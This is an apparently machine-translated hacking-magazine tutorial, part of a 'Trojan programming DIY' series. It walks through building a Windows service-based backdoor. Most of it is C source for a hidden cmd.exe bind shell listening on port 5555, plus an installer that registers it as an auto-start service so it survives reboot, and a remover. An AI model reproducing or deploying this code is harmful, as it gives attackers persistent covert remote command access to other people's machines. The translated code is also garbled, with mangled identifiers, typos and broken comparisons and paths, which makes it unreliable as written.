Trojan programming DIY 8th Service Startup Technology

Trojan programming DIY 8th Service Startup Technology

Text/graphic cold air

You can open the service generator end of a Trojan at will, and you can find that there is a startup method called "Service Startup", which means this technology is popular, but you have written this
Programs? If you have written this article, you can take a cup of tea and take a break. If you are not familiar with it, just take a look at it.

Generally, writing a service requires two programs, one is a functional service program, and the other is a control program used to control the service program. Note that
The program of the service function is different from the general program. The difference is not only whether there is a GUI form, but also in different formats. Next we will first write an external shell
The Service Program of the backdoor.

For a service program, it generally consists of the following four parts: Main (), servicemain () and handler (). Of course, our function implementation functions, such as mywork ()
The relationship between them can be displayed in a simple graph. The basic process of the service program is that main () calls servicemain () and servicemain ()

By calling handler () and executing the function mywork (), you have learned about the process of the service program and implemented the backdoor program step by step according to the above process.
 

1. Main () function of the program entry

The entry of the service program starts from main (), but the difference is that the main of the service program is extremely simple, because it is only responsible for creating the dispatch table and starting the control dispatcher, the Code is as follows:

Void main ()
{
Service_table_entry servicetable [2];
Servicetable [0]. lpservicename = "name"; // thread name
Servicetable [0]. lpserviceproc = (lpservice_main_function) servicemain; // thread entry address
Servicetable [1]. lpservicename = NULL;
Servicetable [1]. lpserviceproc = NULL; // The Last One must be null.
Startservicectrldispatcher (servicetable); // control the dispatch thread of the startup Service
}

Main () is the main thread of the service program. When servie Control Manager starts a service process, it always waits for the service program to call the startservicectrldispatcher () function.
When the service is executed, main () will call the servicemain function. When the servicemain execution is completed or an error occurs, the startservicectrldispatcher function returns, and the main process is terminated.

2. Real service entry servicemain ()

Servicemain () is the real entry point of the service program. It mainly performs the following functions. First, register a handler to process the control program or control panel. service control requirements, such as start, stop, and pause.
The second step is to implement our function operations. The implementation code is as follows:

Void winapi servicemain (DWORD dwargc, lptstr * lpszargv)
{
DWORD status = 0;
DWORD specificerror = 0 xfffffff;
Servicestatus. dwservicetype = service_win32;
Servicestatus. dwcurrentstate = service_start_pending;
Servicestatus. dwcontrolsaccepted = service_accept_stop | service_accept_shutdown | service_accept_pause_continue;
Servicestatus. dwwin32exitcode = 0;
Servicestatus. dwservicespecificexitcode = 0;
Servicestatus. dwcheckpoint = 0;
Servicestatus. dwwaithint = 0;
// Call registerservicectrlhandler () to register a servicehandler function to handle the service control requirements of the program.
Hstatus = registerservicectrlhandler ("servicename", (lphandler_function) servicehandler );
If (hstatus = 0)
Return;
 
// Handle error condition
Status = getlasterror ();
If (status! = No_error)
{
Servicestatus. dwcurrentstate = service_stopped;
Servicestatus. dwcheckpoint = 0;
Servicestatus. dwwaithint = 0;
Servicestatus. dwwin32exitcode = status;
Servicestatus. dwservicespecificexitcode = specificerror;
Setservicestatus (hstatus, & servicestatus );
Return;
}
 
// Initialization complete-Report running status
Servicestatus. dwcurrentstate = service_running;
Servicestatus. dwcheckpoint = 0;
Servicestatus. dwwaithint = 0;
Setservicestatus (hstatus, & servicestatus );

// Start your own working thread
Handle hthread = createthread (null, 0, mainfun, null, 0, null );
If (hthread = NULL)
Return;
}
In servicemain, register a servicehandler function through registerservicectrlhandler to handle the service control requirements of the program. The implementation code of the servicehandler function is as follows:

3. servicehandler () function

When you open the Service Manager, start or stop a service, the servicehandler () function responds to your operation, it will determine your operation and then respond to its implementation Code as follows:

Void winapi servicehandler (DWORD fdwcontrol)
{
Switch (fdwcontrol)
{
Case service_control_pause:
Servicestatus. dwcurrentstate = service_paused;
Break;
Case service_control_continue:
Servicestatus. dwcurrentstate = service_running;
Break;
Case service_control_stop:
Case service_control_shutdown:
Servicestatus. dwcurrentstate = service_stopped;
Servicestatus. dwwin32exitcode = 0;
Servicestatus. dwcheckpoint = 0;
Servicestatus. dwwaithint = 0;
Setservicestatus (hstatus, & servicestatus );
Return;
Case service_control_interrogate:
Break;
Default:
Break;
}
Setservicestatus (hstatus, & servicestatus); // sets the status
Return;
}
Up to now, the three major functions of the Service have been completed. The following is the code after we implement the shell.

4. function implementation functions

This is a simple dual-pipeline Shell server. After running, you can use Telnet IP 5555 for connection. After successful connection, a shell is generated.
The implementation code is as follows:

DWORD winapi mainfun (lpvoid lpparam)
{
Wsadata;
Socket server;
Socket Client;
Sockaddr_in serveraddr;
Sockaddr_in clientaddr;
Int Port = 5555;
Word ver = makeword (2, 2); // judge the Winsock version
Wsastartup (ver, & wsadata); // initial socket
Server = socket (af_inet, sock_stream, ipproto_tcp );
Serveraddr. sin_family = af_inet;
Serveraddr. sin_port = htons (port );
Serveraddr. sin_addr.s_un.s_addr = htonl (inaddr_any );
BIND (server, (sockaddr *) & serveraddr, sizeof (serveraddr ));
Listen (server, 5 );
Int Len = sizeof (clientaddr );
Client = accept (server, (sockaddr *) & clientaddr, & Len );
Handle hwritepipe, hreadpipe, hwriteshell, hreadshell;
Security_attributes sapipe;
Startupinfo lpstartupinfo;
Process_information lpprocessinfo;
Char szbuffer [65535];
DWORD dwbufferread;
Int ret;
Sapipe. nlength = sizeof (sapipe );
Sapipe. binherithandle = true;
Sapipe. lpsecuritydescriptor = NULL;
// Create read and write Pipe
Createpipe (& hreadpipe, & hreadshell, & sapipe, 0 );
Createpipe (& hwriteshell, & hwritepipe, & sapipe, 0 );
Getstartupinfo (& lpstartupinfo );
Lpstartupinfo. cb = sizeof (lpstartupinfo );
Lpstartupinfo. dwflags = startf_useshowwindow | startf_usestdhandles;
Lpstartupinfo. hstdinput = hwriteshell;
Lpstartupinfo. hstdoutput = hreadshell;
Lpstartupinfo. hstderror = hreadshell;
Lpstartupinfo. wshowwindow = sw_hide;
Lpstartupinfo. lpdesktop = "winsta0 // default ";
Char character line [max_path];
Getsystemdirectory (cmdline, max_path );
Strcat (cmdline, "// cmd.exe ");
Ret = CreateProcess (using line, null, true, 0, null, null, & lpstartupinfo, & lpprocessinfo );
While (1)
{
Zeromemory (szbuffer, sizeof (szbuffer ));
Peeknamedpipe (hreadpipe, szbuffer, sizeof (szbuffer), & dwbufferread, null, null );
If (dwbufferread! = 0)
{
Ret = readfile (hreadpipe, szbuffer, sizeof (szbuffer), & dwbufferread, null );
If (RET)
{
Printf ("The readfile buffer is % s:/N", szbuffer );
Emptypipe (hreadpipe );
}
}
Else
{
Zeromemory (szbuffer, sizeof (szbuffer ));
Ret = Recv (client, szbuffer, sizeof (szbuffer), 0 );

If (ret = socket_error)
{
Printf ("socket_error/N ");
Break;
}
If (Ret> 0)
{
Writefile (hwritepipe, szbuffer, RET, & dwbufferread, 0 );
}
}
Sleep (100 );
}
Writefile (hwritepipe, "Exit/R/N", (DWORD) strlen ("Exit/R/N"), & dwbufferread, 0 );
Return 0;
}

Void emptypipe (handle hreadpipe1)
{
Bool ret;
DWORD bytesread;
Char * buffer = new char [1024];
While (true)
{
Memset (buffer );
Ret = peeknamedpipe (hreadpipe1, buffer, 1024, & bytesread );
If (bytesread = 0 |! RET)
{
Delete buffer;
Return;
}
Readfile (hreadpipe1, buffer, bytesread, & bytesread, 0 );
}
}
So far, the service program has been completed. The following two mini programs are respectively written to install and delete the service.

5. Install the Service Program

# Include <windows. h>
# Include <winsvc. h>
# Include <stdio. h>
Main ()
{
Char name [100];
Char info [200];
Char path [300];
Printf ("enter the service name/n ");
Scanf ("% s", & name );
Printf ("enter service description/n ");
Scanf ("% s", & info );
Printf ("enter the program path/n ");
Scanf ("% s", & Path );
SC _handle manager = NULL;
SC _handle service = NULL;
If (Manager = openscmanager (null, null, SC _manager_create_service) = NULL)
{
Printf ("openscmanager error ");
}
Service = createservice (
Manager, name, info,
Service_all_access, service_win32_own_process,
Service_auto_start, service_error_normal,
Path, 0, 0, 0, 0, 0 );
If (service)
Printf ("service created successfully/n ");
Else
Printf ("service creation failed/n ");
Closeservicehandle (service );
Closeservicehandle (manager );
}

6. delete a service program

# Include <windows. h>
# Include <winsvc. h>
# Include <stdio. h>
Void main ()
{
Char name [100];
SC _handle SCM;
SC _handle service;
Service_status status;
Printf ("enter the name of the service to be deleted/n ");
Scanf ("% s", & name );

If (SCM = openscmanager (null, null, SC _manager_create_service) = NULL)
{
Printf ("openscmanager error/N ");
}
Service = openservice (SCM, name, service_all_access | delete );
If (! Service)
{
Printf ("openservice error! /N ");
Return;
}
Bool issuccess = queryservicestatus (Service, & status );
If (! Issuccess)
{
Printf ("queryservicestatus error! /N ");
Return;
}
If (status. dwcurrentstate! = Service_stopped)
{
Issuccess = controlservice (Service, service_control_stop, & status );
If (! Issuccess)
Printf ("Stop Service error! /N ");
Sleep (500 );
}
Issuccess = deleteservice (service );
If (! Issuccess)
Printf ("failed to delete service! /N ");
Else
Printf ("Service Deleted! /N ");
Closeservicehandle (service );
Closeservicehandle (SCM );
}

The creation and deletion services are not described in detail here. If you need them, you can refer to the March magazine, the programming topic "System Service of DIY Trojan programming, use the installer
After you restart your computer, you can use Telnet 127.0.0.1 5555 to execute commands. If you want to write a service program, you can directly change the working thread of the source code. I believe it will be convenient.
Many